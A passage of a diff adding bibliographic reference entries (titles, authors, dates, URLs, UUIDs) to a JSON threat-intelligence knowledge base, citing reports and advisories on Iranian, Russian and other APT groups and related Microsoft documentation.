"https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html" + ], + "source": "MITRE", + "title": "Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables" + }, + "related": [], + "uuid": "a2d79c6a-16d6-4dbd-b8a5-845dcc36212d", + "value": "Talos MuddyWater Jan 2022" + }, + { + "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.", + "meta": { + "date_accessed": "2020-05-22T00:00:00Z", + "date_published": "2020-05-21T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/blog/labs/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/" + ], + "source": "MITRE", + "title": "Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia" + }, + "related": [], + "uuid": "24ea6a5d-2593-4639-8616-72988bf2fa07", + "value": "BitDefender Chafer May 2020" + }, + { + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.", + "meta": { + "date_accessed": "2022-09-27T00:00:00Z", + "date_published": "2022-02-24T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + ], + "source": "MITRE", + "title": "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks" + }, + "related": [], + "uuid": "e76570e1-43ab-4819-80bc-895ede67a205", + "value": "DHS CISA AA22-055A MuddyWater February 2022" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2022, November 25). Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester. Retrieved October 25, 2023.", + "meta": { + "date_accessed": "2023-10-25T00:00:00Z", + "date_published": "2022-11-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a" + ], + "source": "Tidal Cyber", + "title": "Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester" + }, + "related": [], + "uuid": "daae1f54-8471-4620-82d5-023d04144acd", + "value": "U.S. CISA Advisory November 25 2022" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2021, November 19). Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities. Retrieved October 25, 2023.", + "meta": { + "date_accessed": "2023-10-25T00:00:00Z", + "date_published": "2021-11-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a" + ], + "source": "Tidal Cyber", + "title": "Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities" + }, + "related": [], + "uuid": "d7014279-bc6a-43d4-953a-a6bc1d97a13b", + "value": "U.S. CISA Iranian Government Actors November 19 2021" + }, + { + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2014-05-29T00:00:00Z", + "refs": [ + "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + ], + "source": "MITRE", + "title": "Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation" + }, + "related": [], + "uuid": "9abb4bbb-bad3-4d22-b235-c8a35465f2ce", + "value": "NEWSCASTER2014" + }, + { + "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2022-01-12T00:00:00Z", + "refs": [ + "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" + ], + "source": "MITRE", + "title": "Iranian intel cyber suite of malware uses open source tools" + }, + "related": [], + "uuid": "671e1559-c7dc-4cb4-a9a1-21776f2ae56a", + "value": "CYBERCOM Iranian Intel Cyber January 2022" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2022, September 14). Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations. Retrieved October 25, 2023.", + "meta": { + "date_accessed": "2023-10-25T00:00:00Z", + "date_published": "2022-09-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a" + ], + "source": "Tidal Cyber", + "title": "Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations" + }, + "related": [], + "uuid": "728b20b0-f702-4dbe-afea-50270648a3a2", + "value": "U.S. CISA IRGC Actors September 14 2022" + }, + { + "description": "Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.", + "meta": { + "date_accessed": "2017-12-27T00:00:00Z", + "date_published": "2017-02-15T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" + ], + "source": "MITRE", + "title": "Iranian PupyRAT Bites Middle Eastern Organizations" + }, + "related": [], + "uuid": "f9de25b4-5539-4a33-84b5-f26a84544859", + "value": "Secureworks Cobalt Gypsy Feb 2017" + }, + { + "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.", + "meta": { + "date_accessed": "2017-05-03T00:00:00Z", + "date_published": "2017-01-05T00:00:00Z", + "refs": [ + "http://www.clearskysec.com/oilrig/" + ], + "source": "MITRE", + "title": "Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford" + }, + "related": [], + "uuid": "f19f9ad4-bb31-443b-9c26-87946469a0c3", + "value": "ClearSky OilRig Jan 2017" + }, + { + "description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2018-03-13T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html" + ], + "source": "MITRE", + "title": "Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign" + }, + "related": [], + "uuid": "82cddfa6-9463-49bb-8bdc-0c7d6b0e1472", + "value": "FireEye MuddyWater Mar 2018" + }, + { + "description": "Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "meta": { + "date_accessed": "2021-05-05T00:00:00Z", + "date_published": "2021-04-08T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + ], + "source": "MITRE", + "title": "Iran’s APT34 Returns with an Updated Arsenal" + }, + "related": [], + "uuid": "593e8f9f-88ec-4bdc-90c3-1a320fa8a041", + "value": "Check Point APT34 April 2021" + }, + { + "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.", + "meta": { + "date_accessed": "2020-05-22T00:00:00Z", + "date_published": "2019-01-30T00:00:00Z", + "refs": [ + "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764" + ], + "source": "MITRE", + "title": "Iran Ups its Traditional Cyber Espionage Tradecraft" + }, + "related": [], + "uuid": "b310dfa4-f4ee-4a0c-82af-b0fdef1a1f58", + "value": "Dark Reading APT39 JAN 2019" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, December 1). IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities. Retrieved December 5, 2023.", + "meta": { + "date_accessed": "2023-12-05T00:00:00Z", + "date_published": "2023-12-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a" + ], + "source": "Tidal Cyber", + "title": "IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities" + }, + "related": [], + "uuid": "51a18523-5276-4a67-8644-2bc6997d043c", + "value": "U.S. CISA IRGC-Affiliated PLC Activity December 2023" + }, + { + "description": "Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.", + "meta": { + "date_accessed": "2022-02-22T00:00:00Z", + "refs": [ + "http://www.secureworks.com/research/threat-profiles/iron-hemlock" + ], + "source": "MITRE", + "title": "IRON HEMLOCK" + }, + "related": [], + "uuid": "36191a48-4661-42ea-b194-2915c9b184f3", + "value": "Secureworks IRON HEMLOCK Profile" + }, + { + "description": "Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.", + "meta": { + "date_accessed": "2022-02-22T00:00:00Z", + "refs": [ + "http://www.secureworks.com/research/threat-profiles/iron-hunter" + ], + "source": "MITRE", + "title": "IRON HUNTER" + }, + "related": [], + "uuid": "af5cb7da-61e0-49dc-8132-c019ce5ea6d3", + "value": "Secureworks IRON HUNTER Profile" + }, + { + "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/iron-liberty" + ], + "source": "MITRE", + "title": "IRON LIBERTY" + }, + "related": [], + "uuid": "b82ba824-4543-41ec-a686-6479d5f67b4d", + "value": "Secureworks IRON LIBERTY" + }, + { + "description": "Reichel, D. (2021, February 19). IronNetInjector: Turla’s New Malware Loading Tool. Retrieved February 24, 2021.", + "meta": { + "date_accessed": "2021-02-24T00:00:00Z", + "date_published": "2021-02-19T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/ironnetinjector/" + ], + "source": "MITRE", + "title": "IronNetInjector: Turla’s New Malware Loading Tool" + }, + "related": [], + "uuid": "f04c89f7-d951-4ebc-a5e4-2cc69476c43f", + "value": "Unit 42 IronNetInjector February 2021" + }, + { + "description": "Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.", + "meta": { + "date_accessed": "2022-02-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/iron-ritual" + ], + "source": "MITRE", + "title": "IRON RITUAL" + }, + "related": [], + "uuid": "c1ff66d6-3ea3-4347-8a8b-447cd8b48dab", + "value": "Secureworks IRON RITUAL Profile" + }, + { + "description": "Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.", + "meta": { + "date_accessed": "2021-11-12T00:00:00Z", + "date_published": "2021-04-09T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html" + ], + "source": "MITRE", + "title": "Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware" + }, + "related": [], + "uuid": "d0890d4f-e7ca-4280-a54e-d147f6dd72aa", + "value": "Trend Micro Iron Tiger April 2021" + }, + { + "description": "Daniel Lunghi. (2023, March 1). Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting. Retrieved March 20, 2023.", + "meta": { + "date_accessed": "2023-03-20T00:00:00Z", + "date_published": "2023-03-01T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html" + ], + "source": "MITRE", + "title": "Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting" + }, + "related": [], + "uuid": "1acc2a21-4456-5fbc-9732-87550cea8b53", + "value": "Lunghi Iron Tiger Linux" + }, + { + "description": "Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.", + "meta": { + "date_accessed": "2022-02-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/iron-tilden" + ], + "source": "MITRE", + "title": "IRON TILDEN" + }, + "related": [], + "uuid": "45969d87-02c1-4074-b708-59f4c3e39426", + "value": "Secureworks IRON TILDEN Profile" + }, + { + "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.", + "meta": { + "date_accessed": "2022-02-28T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/iron-twilight" + ], + "source": "MITRE", + "title": "IRON TWILIGHT" + }, + "related": [], + "uuid": "2fc5b9dc-3745-4760-b116-5cc5abb9101d", + "value": "Secureworks IRON TWILIGHT Profile" + }, + { + "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.", + "meta": { + "date_accessed": "2022-02-28T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/iron-twilight-supports-active-measures" + ], + "source": "MITRE, Tidal Cyber", + "title": "IRON TWILIGHT Supports Active Measures" + }, + "related": [], + "uuid": "0d28c882-5175-4bcf-9c82-e6c4394326b6", + "value": "Secureworks IRON TWILIGHT Active Measures March 2017" + }, + { + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2020-05-01T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/iron-viking" + ], + "source": "MITRE", + "title": "IRON VIKING Threat Profile" + }, + "related": [], + "uuid": "900753b3-c5a2-4fb5-ab7b-d38df867077b", + "value": "Secureworks IRON VIKING" + }, + { + "description": "ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022.", + "meta": { + "date_accessed": "2022-04-10T00:00:00Z", + "date_published": "2022-03-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine" + ], + "source": "MITRE", + "title": "IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine" + }, + "related": [], + "uuid": "e0337ce9-2ca9-4877-b116-8c4d9d864df0", + "value": "ESET Hermetic Wizard March 2022" + }, + { + "description": "Microsoft. (2016, September 26). ISAPI/CGI Restrictions . Retrieved June 3, 2021.", + "meta": { + "date_accessed": "2021-06-03T00:00:00Z", + "date_published": "2016-09-26T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/iis/configuration/system.webserver/security/isapicgirestriction/" + ], + "source": "MITRE", + "title": "ISAPI/CGI Restrictions " + }, + "related": [], + "uuid": "7d42501b-5a6e-4916-aa58-64ce6c00501e", + "value": "Microsoft ISAPICGIRestriction 2016" + }, + { + "description": "Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.", + "meta": { + "date_accessed": "2021-06-03T00:00:00Z", + "date_published": "2017-06-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)" + ], + "source": "MITRE", + "title": "ISAPI Extension Overview" + }, + "related": [], + "uuid": "d00a692f-b990-4757-8acd-56818462ac0c", + "value": "Microsoft ISAPI Extension Overview 2017" + }, + { + "description": "Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.", + "meta": { + "date_accessed": "2021-06-03T00:00:00Z", + "date_published": "2017-06-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)" + ], + "source": "MITRE", + "title": "ISAPI Filter Overview" + }, + "related": [], + "uuid": "2fdbf1ba-0480-4d70-9981-3b5967656472", + "value": "Microsoft ISAPI Filter Overview 2017" + }, + { + "description": "Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2014-10-14T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/" + ], + "source": "MITRE", + "title": "iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign" + }, + "related": [], + "uuid": "31262b8d-27fb-4976-9d53-4fb39b5b835a", + "value": "iSight Sandworm Oct 2014" + }, + { + "description": "CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "refs": [ + "https://blog.crysys.hu/2013/03/teamspy/" + ], + "source": "MITRE", + "title": "Ispolzovat’ tolko s razreshenija S-a" + }, + "related": [], + "uuid": "f21ea3e2-7983-44d2-b78f-80d84bbc4f52", + "value": "CrySyS Blog TeamSpy" + }, + { + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2011-01-15T00:00:00Z", + "refs": [ + "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + ], + "source": "MITRE", + "title": "Israeli Test on Worm Called Crucial in Iran Nuclear Delay" + }, + "related": [], + "uuid": "38b0cf78-88d0-487f-b2b0-81264f457dd0", + "value": "NYTStuxnet" + }, + { + "description": "Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.", + "meta": { + "date_accessed": "2018-01-12T00:00:00Z", + "date_published": "2011-07-19T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/dd939934.aspx" + ], + "source": "MITRE", + "title": "Issues with BITS" + }, + "related": [], + "uuid": "c67ddc5e-9e6c-40c0-9876-ee191cda7658", + "value": "Microsoft Issues with BITS July 2011" + }, + { + "description": "Ready.gov. (n.d.). IT Disaster Recovery Plan. Retrieved March 15, 2019.", + "meta": { + "date_accessed": "2019-03-15T00:00:00Z", + "refs": [ + "https://www.ready.gov/business/implementation/IT" + ], + "source": "MITRE", + "title": "IT Disaster Recovery Plan" + }, + "related": [], + "uuid": "66da7fcb-421b-4e2f-b575-222f465d5901", + "value": "Ready.gov IT DRP" + }, + { + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.", + "meta": { + "date_accessed": "2020-10-08T00:00:00Z", + "date_published": "2020-04-07T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" + ], + "source": "MITRE", + "title": "ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework" + }, + "related": [], + "uuid": "32569f59-14fb-4581-8a42-3bf49fb189e9", + "value": "Security Intelligence ITG08 April 2020" + }, + { + "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.", + "meta": { + "date_accessed": "2020-05-11T00:00:00Z", + "date_published": "2019-06-04T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html" + ], + "source": "MITRE", + "title": "It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign" + }, + "related": [], + "uuid": "a6faa495-db01-43e8-9db3-d446570802bc", + "value": "Talos Frankenstein June 2019" + }, + { + "description": "Metcalf, S. (2015, July 15). It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.", + "meta": { + "date_accessed": "2019-02-14T00:00:00Z", + "date_published": "2015-07-15T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=1588" + ], + "source": "MITRE", + "title": "It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts" + }, + "related": [], + "uuid": "09d3ccc1-cd8a-4675-88c0-84110f5b8e8b", + "value": "AdSecurity Forging Trust Tickets" + }, + { + "description": "Micah Babinski. (2020, October 16). It’s Always DarkGate Before the Dawn. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "date_published": "2020-10-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://micahbabinski.medium.com/its-always-darkgate-before-the-dawn-d6cf1ec56f7e" + ], + "source": "Tidal Cyber", + "title": "It’s Always DarkGate Before the Dawn" + }, + "related": [], + "uuid": "0c7c6dfa-2ba9-4f74-aeca-d97dd3a3a1cc", + "value": "It’s Always DarkGate Before the Dawn" + }, + { + "description": "Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.", + "meta": { + "date_accessed": "2019-06-13T00:00:00Z", + "date_published": "2016-11-17T00:00:00Z", + "refs": [ + "https://citizenlab.ca/2016/11/parliament-keyboy/" + ], + "source": "MITRE", + "title": "It’s Parliamentary KeyBoy and the targeting of the Tibetan Community" + }, + "related": [], + "uuid": "a9394372-3981-4f41-ad66-9db343e773b1", + "value": "CitizenLab KeyBoy Nov 2016" + }, + { + "description": "Carr, N. (2017, December 22). ItsReallyNick Status Update. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2017-12-22T00:00:00Z", + "refs": [ + "https://twitter.com/ItsReallyNick/status/944321013084573697" + ], + "source": "MITRE", + "title": "ItsReallyNick Status Update" + }, + "related": [], + "uuid": "2ca502a2-664c-4b85-9d6c-1bc96dfb8332", + "value": "Twitter ItsReallyNick Status Update APT32 PubPrn" + }, + { + "description": "Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.", + "meta": { + "date_accessed": "2019-06-07T00:00:00Z", + "date_published": "2012-05-22T00:00:00Z", + "refs": [ + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_ixeshe.pdf" + ], + "source": "MITRE", + "title": "IXESHE An APT Campaign" + }, + "related": [], + "uuid": "fcea0121-cd45-4b05-8c3f-f8dad8c790b3", + "value": "Trend Micro IXESHE 2012" + }, + { + "description": "James. (2019, July 14). @James_inthe_box. Retrieved March 28, 2022.", + "meta": { + "date_accessed": "2022-03-28T00:00:00Z", + "date_published": "2019-07-14T00:00:00Z", + "refs": [ + "https://twitter.com/james_inthe_box/status/1150495335812177920" + ], + "source": "MITRE", + "title": "@James_inthe_box" + }, + "related": [], + "uuid": "5a9e4f0f-83d6-4f18-a358-a9ad450c2734", + "value": "James TermServ DLL" + }, + { + "description": "Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2020-11-17T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage" + ], + "source": "MITRE", + "title": "Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign" + }, + "related": [], + "uuid": "28a7bbd8-d664-4234-9311-2befe0238b5b", + "value": "Symantec Cicada November 2020" + }, + { + "description": "Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.", + "meta": { + "date_accessed": "2019-06-18T00:00:00Z", + "date_published": "2019-05-14T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/" + ], + "source": "MITRE", + "title": "JCry Ransomware" + }, + "related": [], + "uuid": "deb97163-323a-493a-9c73-b41c8c5e5cd1", + "value": "Carbon Black JCry May 2019" + }, + { + "description": "ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017.", + "meta": { + "date_accessed": "2017-08-21T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "http://www.clearskysec.com/copykitten-jpost/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten" + }, + "related": [], + "uuid": "f5a42615-0e4e-4d43-937d-05d2efe636cf", + "value": "ClearSky CopyKittens March 2017" + }, + { + "description": "Joe Sandbox. (n.d.). Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.joesandbox.com/analysis/1280109/0/html" + ], + "source": "Tidal Cyber", + "title": "Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb" + }, + "related": [], + "uuid": "c2a10cde-2c20-4090-9e8d-ca60edf07a2e", + "value": "Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb" + }, + { + "description": "Joe Slowik. (2019, August 15) CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack. Retrieved October 22, 2019", + "meta": { + "date_accessed": "2019-10-22T00:00:00Z", + "refs": [ + "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + ], + "source": "MITRE", + "title": "Joe Slowik August 2019" + }, + "related": [], + "uuid": "7297ee41-b26e-5762-8b0f-7dcdf780f86a", + "value": "Joe Slowik August 2019" + }, + { + "description": "US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.", + "meta": { + "date_accessed": "2021-03-08T00:00:00Z", + "refs": [ + "https://noticeofpleadings.com/phosphorus/files/Complaint.pdf" + ], + "source": "MITRE", + "title": "JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS" + }, + "related": [], + "uuid": "8f73a709-fb7e-4d9e-9743-4ba39ea26ea8", + "value": "US District Court of DC Phosphorus Complaint 2019" + }, + { + "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.", + "meta": { + "date_accessed": "2019-03-11T00:00:00Z", + "date_published": "2018-10-11T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools" + ], + "source": "MITRE", + "title": "Joint report on publicly available hacking tools" + }, + "related": [], + "uuid": "601d88c5-4789-4fa8-a9ab-abc8137f061c", + "value": "NCSC Joint Report Public Tools" + }, + { + "description": "FBI, CISA, ODNI, NSA. (2022, January 5). Joint Statement by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA). Retrieved March 26, 2023.", + "meta": { + "date_accessed": "2023-03-26T00:00:00Z", + "date_published": "2022-01-05T00:00:00Z", + "refs": [ + "https://www.cisa.gov/news-events/news/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure" + ], + "source": "MITRE", + "title": "Joint Statement by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA)" + }, + "related": [], + "uuid": "336a6549-a95d-5763-bbaf-5ef0d3141800", + "value": "USG Joint Statement SolarWinds January 2021" + }, + { + "description": "LOLBAS. (2019, May 31). Jsc.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-05-31T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Jsc/" + ], + "source": "Tidal Cyber", + "title": "Jsc.exe" + }, + "related": [], + "uuid": "ae25ff74-05eb-46d7-9c60-4c149b7c7f1f", + "value": "Jsc.exe - LOLBAS Project" + }, + { + "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2009-08-01T00:00:00Z", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf" + ], + "source": "MITRE", + "title": "Juniper Netscreen of the Dead" + }, + "related": [], + "uuid": "3b87bd85-c6dd-4bd9-9427-33b5bd84db4a", + "value": "Juniper Netscreen of the Dead" + }, + { + "description": "Microsoft. (2022, November 17). Just Enough Administration. Retrieved March 27, 2023.", + "meta": { + "date_accessed": "2023-03-27T00:00:00Z", + "date_published": "2022-11-17T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.3" + ], + "source": "MITRE", + "title": "Just Enough Administration" + }, + "related": [], + "uuid": "09c99ca2-5f10-5f78-9ba3-5e0e79ce8d96", + "value": "Microsoft PS JEA" + }, + { + "description": "Office of Public Affairs. (2024, February 15). Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). Retrieved February 29, 2024.", + "meta": { + "date_accessed": "2024-02-29T00:00:00Z", + "date_published": "2024-02-15T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian" + ], + "source": "Tidal Cyber", + "title": "Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)" + }, + "related": [], + "uuid": 